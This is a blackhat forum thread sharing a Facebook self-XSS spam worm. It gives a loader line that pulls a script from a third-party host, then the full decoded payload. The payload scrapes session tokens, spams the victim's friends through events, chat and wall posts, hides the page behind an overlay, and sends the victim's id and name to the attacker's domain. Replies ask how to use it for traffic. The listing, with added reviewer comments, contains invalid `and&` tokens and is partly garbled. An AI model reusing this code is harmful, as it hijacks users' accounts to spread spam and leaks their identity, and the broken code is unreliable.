Best Blackhat Forum

[GET] Facebook Profile Hacker 2.0
This is not for NOOB, please use with caution

I was a little bored today and came to this page:



Code:
http://dumbfb.blogspot.com

You'll notice this section:


Code:
// Self-XSS loader as shown on the lure page. Run in a logged-in tab, it creates a
// <script> element, sets its src to a protocol-relative URL on a third-party host,
// and appends it to document.body, so the remote file executes in that page's
// origin with the visitor's session. The hostname is a network indicator for
// blocklists and proxy/DNS log searches.
javascript:(a=(b=document).createElement('script')).src='//hefoll0wme.info/checker2.js',b.body.appendChild(a);void(0)
It tricks visitors into pasting that code into the address bar, which injects the malicious JavaScript into their logged-in Facebook session. The script then spams their wall and their friends' walls, and also opens Facebook's Ajax chat and spams a message there.

So I fully decoded this shit:


Code:
// Configuration for the decoded spam script (analysis copy of a hostile sample).
// The two hostnames below (lure URL and redirect target) are the sample's
// network indicators, together with the loader host.

// Random suffix appended to the lure URL so each posted link differs.
var randomnumber = Math['floor'](Math['random']() * 99999);
// randomnumber1..4 and `random` are computed but never referenced in this listing.
var randomnumber1 = Math['floor'](Math['random']() * 987);
var randomnumber2 = Math['floor'](Math['random']() * 754);
var randomnumber3 = Math['floor'](Math['random']() * 43);
var randomnumber4 = Math['floor'](Math['random']() * 9);
var random = Math['floor'](Math['random']() * 5);
// Lure page that every spam message links to.
var url = 'http://hellobusters.blogspot.com?';
// Chat template; %firstname% is replaced per recipient in the chat task.
var message = '%firstname%, i can hack ANY facebook account! it\'s so easy! check it out ';
// Event description text (\x0A is a newline).
var ev = 'Hey everyone, \x0A\x0A  I have found out how you can hack ANYONE\'s facebook account \x0A\x0A it\'s so easy! \x0A check it out - ';
// Not referenced anywhere in this listing.
var ev2 = '\x0A\x0Ajust don\'t log into mine :)';
// Wall-post template; each %tf% placeholder is replaced with one friend of the victim.
var test = 'I have hacked: %tf%\'s, %tf%\'s, %tf%\'s and %tf%\'s accounts!\x0A\x0A it\'s so easy!\x0ACheck it out - ';
var eventname = 'HACK FACEBOOK!!';
// Third-party page the victim's top-level window is sent to when the tasks finish (see mf).
var redirect = 'http://hefoll0wme.info/final.php';
// Final message bodies: template + lure URL + random suffix.
var postmessage = test + url + randomnumber;
var chatmessage = message + url + randomnumber;
var eventdesc = ev + url + randomnumber;
// Upper bound on the number of per-friend wall posts (passed to the posting loop).
var nfriends = 4000;
// When true, the wall-post task shows alert() diagnostics.
var debug = false;
// Count of tasks still pending; mf() redirects only once this is <= 0.
var wf = 0;
// Completion hook: when no task is pending (wf <= 0), navigates the top-level
// window to `redirect` after a 500 ms delay. Callers invoke it as mf(--wf); the
// function declares no parameters, so that argument only has the side effect of
// decrementing the global counter before the check runs.
var mf = function () {
        if (wf <= 0) {
            setTimeout(function () {
                window['top']['location']['href'] = redirect
            }, 500)
        }
    };
// Minimal asynchronous GET helper.
//   a - URL to request (every call in this listing passes a relative path, so the
//       request goes to the origin of the page the script was injected into)
//   b - optional callback, receives responseText when the status is 200
//   c - optional callback, invoked whenever the request completes, whatever the status
// NOTE(review): the `and&` token in the status check is not valid JavaScript, so the
// listing as posted does not parse; likely an artifact of how the forum rendered the text.
var doget = function (a, b, c) {
        var d = new XMLHttpRequest();
        d['open']('GET', a);
        d['onreadystatechange'] = function () {
            // readyState 4 = request finished
            if (d['readyState'] == 4) {
                if (d['status'] == 200 and& b) {
                    b(d['responseText'])
                };
                if (c) {
                    c()
                }
            }
        };
        d['send']()
    };
// Main payload. Requests the site root ('/') from inside the injected page and
// scrapes the returned HTML (u) for the per-session form tokens, then starts up
// to three spam tasks (event invitation, chat messages, wall posts). Each task
// increments the global `wf` counter, and mf() redirects the victim once it
// drops to zero.
// Defensive takeaway: the script runs in the page's own origin, so anti-CSRF
// tokens give no protection here; it reads them from the page like any
// first-party code would.
doget('/', function (u) {
    // v: numeric user id read from the `c_user` cookie via document.cookie.
    // Throws if the cookie is missing (match() returns null before the [1]).
    var v = document['cookie']['match'](/c_user=(\d+)/)[1];
    // w: builds the string '@[id:name]' for a friend record, '' for a falsy value.
    // NOTE(review): looks like the site's tagging/mention syntax - unconfirmed.
    var w = function (a) {
            return a ? '@[' + a['id'] + ':' + a['name'] + ']' : ''
        };
    // x: plain display name of a friend record, '' for a falsy value.
    var x = function (a) {
            return a ? a['name'] : ''
        };
    // y: serializes an object into a request body, URI-encoding each value;
    // a null value emits the key alone with no '='. `out` is assigned without a
    // declaration, so it is an implicit global. As posted, pairs are joined with
    // the literal string 'and' - NOTE(review): probably the same forum rendering
    // artifact as the `and&` tokens elsewhere in the listing.
    var y = function (a) {
            out = '';
            for (var b in a) {
                out += (out ? 'and' : '') + b + ((a[b] !== null) ? '=' + encodeURIComponent(a[b]) : '')
            };
            return out
        };
    // z: asynchronous form POST helper.
    //   a - URL, b - parameter object (serialized by y),
    //   c - optional callback with responseText on status 200,
    //   d - optional callback run on completion whatever the status.
    // NOTE(review): contains the same invalid `and&` token as doget().
    var z = function (a, b, c, d) {
            var e = new XMLHttpRequest();
            e['open']('POST', a);
            e['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
            e['onreadystatechange'] = function () {
                if (e['readyState'] == 4) {
                    if (e['status'] == 200 and& c) {
                        c(e['responseText'])
                    };
                    if (d) {
                        d()
                    }
                }
            };
            e['send'](y(b))
        };
    // A: covers the whole page with an opaque white, top-most <div> showing a
    // "please wait" message, which hides the page while the requests below run.
    // The embedded link resets wf and calls mf(), forcing the redirect.
    var A = function () {
            var a = document['createElement']('div');
            a['style']['display'] = 'block';
            a['style']['position'] = 'absolute';
            a['style']['width'] = 100 + '%';
            a['style']['height'] = 100 + '%';
            a['style']['left'] = 0 + 'px';
            a['style']['top'] = 0 + 'px';
            a['style']['textAlign'] = 'center';
            a['style']['padding'] = '4px';
            a['style']['background'] = '#FFFFFF';
            a['style']['zIndex'] = 999999;
            a['innerHTML'] = '&nbsp;<br/>Please wait, this can take a little while...<br/><br/> If it takes more than a minute..<a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
            document['body']['appendChild'](a)
        };
    // Scrape the composer id (backslash-escaped quote form) from the fetched HTML;
    // `comp` is an implicit global and falls back to '' when the field is absent.
    var B = u['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
    if (B) {
        comp = B[1]
    } else {
        comp = ''
    };
    // C and D: hidden form fields `post_form_id` and `fb_dtsg` scraped from the
    // fetched HTML and replayed in every POST below. Either line throws if the
    // field is not found (indexing the null returned by match()).
    var C = u['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
    var D = u['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
    // E: text of the first child node of the #navAccountName element.
    // NOTE(review): presumably the logged-in user's display name - confirm.
    var E = document['getElementById']('navAccountName')['firstChild']['data'];
    // The victim's user id and name are appended to the redirect URL, so they are
    // disclosed to the third-party host as query parameters on the final navigation.
    redirect = redirect + '?' + y({
        userid: v,
        name: E,
        doclose: 1
    });
    // Show the overlay before any request is sent.
    A();
    // --- Task 1: create an event and invite the victim's friends ---
    if (eventdesc) {
        wf++;
        // First POST only serves to obtain the "token" value used by the friend lookup.
        z('/ajax/choose/?__a=1', {
            type: 'event',
            eid: null,
            invite_message: '',
            __d: 1,
            post_form_id: C,
            fb_dtsg: D,
            lsd: null,
            post_form_id_source: 'AsyncRequest'
        }, function (h) {
            // Throws if the response carries no "token" field.
            var i = h['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
            var j = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + v + '&token=' + i + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
            doget(j, function (a) {
                // b: every '{"uid":<digits>,' fragment in the response;
                // b is null (and b['length'] throws) when nothing matches.
                var b = a['match'](/\{"uid":\d+,/g);
                // c: collected friend ids, excluding the victim's own id.
                var c = [];
                for (var d = 0; d < b['length']; d++) {
                    var e = b[d]['match'](/:(\d+),/)[1];
                    if (e != v) {
                        c['push'](e)
                    }
                };
                // Event start is set 24 hours from now; datestr is M/D/YYYY and
                // timestr is the hour multiplied by 60 (both implicit globals).
                var f = new Date();
                f['setTime'](f['getTime']() + 60 * 60 * 24 * 1000);
                datestr = (f['getMonth']() + 1) + '/' + f['getDate']() + '/' + f['getFullYear']();
                timestr = f['getHours']() * 60;
                // g: event-creation form; the spam text goes in `desc` and every
                // collected friend id is listed in `sgb_invitees`.
                var g = {
                    post_form_id: C,
                    fb_dtsg: D,
                    start_dateIntlDisplay: datestr,
                    start_date: datestr,
                    start_time_hour_min: timestr,
                    name: eventname,
                    place_page_id: '',
                    location: '',
                    street: '',
                    geo_id: '',
                    geo_sq: '',
                    desc: eventdesc,
                    sgb_invitees: c['join'](','),
                    sgb_emails: '',
                    sgb_message: '',
                    privacy_type: 'on',
                    guest_list: 'on',
                    connections_can_post: 'on',
                    save: 'Create Event',
                    submitting: ''
                };
                g['new'] = '';
                // No success callback (false); the completion callback marks this
                // task done and lets mf() decide whether to redirect.
                z('/events/create.php', g, false, function () {
                    mf(--wf)
                })
            })
        })
    };
    // --- Task 2: send the chat lure to every contact listed as available ---
    if (chatmessage) {
        wf++;
        z('/ajax/chat/buddy_list.php?__a=1', {
            user: v,
            post_form_id: C,
            fb_dtsg: D,
            lsd: null,
            post_form_id_source: 'AsyncRequest',
            popped_out: false,
            force_render: true
        }, function (a) {
            // Drops the first 9 characters of the response before evaluating it.
            // NOTE(review): presumably a fixed non-JSON prefix on the endpoint's replies - confirm.
            var b = a['substr'](9);
            // Flag: eval() runs the response text as code rather than parsing it as data.
            var c = eval('(' + b + ')');
            var d = c['payload']['buddy_list'];
            // e iterates the keys of nowAvailableList, which are used as recipient ids.
            for (var e in d['nowAvailableList']) {
                // f, g and h are computed but never used; the request below
                // recomputes the same three expressions inline.
                var f = Math['floor'](Math['random']() * 1335448958);
                var g = (new Date())['getTime']();
                var h = chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']());
                // Fire-and-forget POST: no callbacks are passed.
                z('/ajax/chat/send.php?__a=1', {
                    msg_id: Math['floor'](Math['random']() * 1335448958),
                    client_time: (new Date())['getTime'](),
                    msg_text: chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']()),
                    to: e,
                    post_form_id: C,
                    fb_dtsg: D,
                    post_form_id_source: 'AsyncRequest'
                })
            };
            // The task is marked done as soon as the sends are queued, not when they complete.
            mf(--wf)
        })
    };
    // --- Task 3: post the lure on the victim's wall and on friends' walls ---
    if (postmessage) {
        wf++;
        doget('/ajax/browser/friends/?uid=' + v + '&filter=all&__a=1&__d=1', function (g) {
            // h: one match per friend entry (thumbnail path through the closing
            // anchor) in the escaped response; null when nothing matches.
            var h = g['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
            // i: friend records {id, name} parsed out of each match.
            var i = [];
            if (h) {
                for (var j = 0; j < h['length']; j++) {
                    // k: the digits between underscores in the thumbnail file name.
                    var k = h[j]['match'](/_\d+_/)[0]['replace'](/_/g, '');
                    // l: the anchor text, with the escaped closing tag and '>' stripped.
                    var l = h[j]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
                    i['push']({
                        id: k,
                        name: l
                    })
                }
            };
            // Randomize the order: each pass copies a random element of i into both
            // n and o, then removes it from i (shift the head and, unless the head
            // itself was picked, write the old head over the picked slot).
            // n supplies names for the %tf% placeholders; o supplies post targets.
            var n = [];
            var o = [];
            while (i['length']) {
                var p = Math['floor'](Math['random']() * i['length']);
                n['push'](i[p]);
                o['push'](i[p]);
                var q = i['shift']();
                if (p) {
                    i[p - 1] = q
                }
            };
            if (debug) {
                alert('fetched friends: ' + n['length'])
            };
            // r: status-update form targeting the victim's own id (context 'home').
            var r = {
                post_form_id: C,
                fb_dtsg: D,
                xhpc_composerid: comp,
                xhpc_targetid: v,
                xhpc_context: 'home',
                xhpc_fbx: '',
                lsd: null,
                post_form_id_source: 'AsyncRequest'
            };
            // mt: message with plain names; m: message with '@[id:name]' strings.
            // Both are implicit globals.
            mt = postmessage;
            m = postmessage;
            // Each %tf% consumes one entry from n; once n is empty, pop() returns
            // undefined and x()/w() substitute an empty string.
            while (mt['search']('%tf%') >= 0) {
                var s = n['pop']();
                mt = mt['replace']('%tf%', x(s));
                m = m['replace']('%tf%', w(s))
            };
            r['xhpc_message_text'] = mt;
            r['xhpc_message'] = m;
            if (debug) {
                alert('message text: ' + mt)
            };
            z('/ajax/updatestatus.php?__a=1', r);
            // t: posts to one friend's profile per call and re-schedules itself
            // every 2000 ms. It stops, zeroes wf and triggers the redirect when the
            // budget `a` reaches 0 or when n has no names left. Note that a target
            // is taken from o before the n-is-empty check runs.
            var t = function (a) {
                    if (a == 0) {
                        wf = 0;
                        mf();
                        return
                    };
                    var b = o['shift']();
                    var c = {
                        post_form_id: C,
                        fb_dtsg: D,
                        xhpc_composerid: comp,
                        xhpc_targetid: b['id'],
                        xhpc_context: 'profile',
                        xhpc_fbx: 1,
                        lsd: null,
                        post_form_id_source: 'AsyncRequest'
                    };
                    var d = postmessage;
                    var e = postmessage;
                    if (n['length'] == 0) {
                        wf = 0;
                        mf();
                        return
                    };
                    // Same placeholder substitution as for the own-wall post above.
                    while (d['search']('%tf%') >= 0) {
                        var f = n['pop']();
                        d = d['replace']('%tf%', x(f));
                        e = e['replace']('%tf%', w(f))
                    };
                    c['xhpc_message_text'] = d;
                    c['xhpc_message'] = e;
                    z('/ajax/updatestatus.php?__a=1', c);
                    setTimeout(function () {
                        t(a - 1)
                    }, 2000)
                };
            // Second increment for this task; t() resets wf to 0 when it finishes.
            wf++;
            setTimeout(function () {
                t(nfriends)
            }, 2000)
        })
    };
    // Called right after the tasks are started: wf is already above zero if any
    // task was entered, so this call redirects only when none was.
    mf()
});
Enjoy!
Just as you said This is not for NOOB, please use with caution

thanks for this
is this the same trick as the blackhat "Auto Like" script where it auto like whoever goes to the link and automatically post a share in their respective FB?
how can we use this to get traffic to a site????
What is th point with this...??
How in the world would I be able to use this?
i run and it's do nothing
LOL http://dumbfb.blogspot.com it contains that viral script too -_-
Does this still work?
Gonna give this a try :)
didnt work for me :)
but thanks!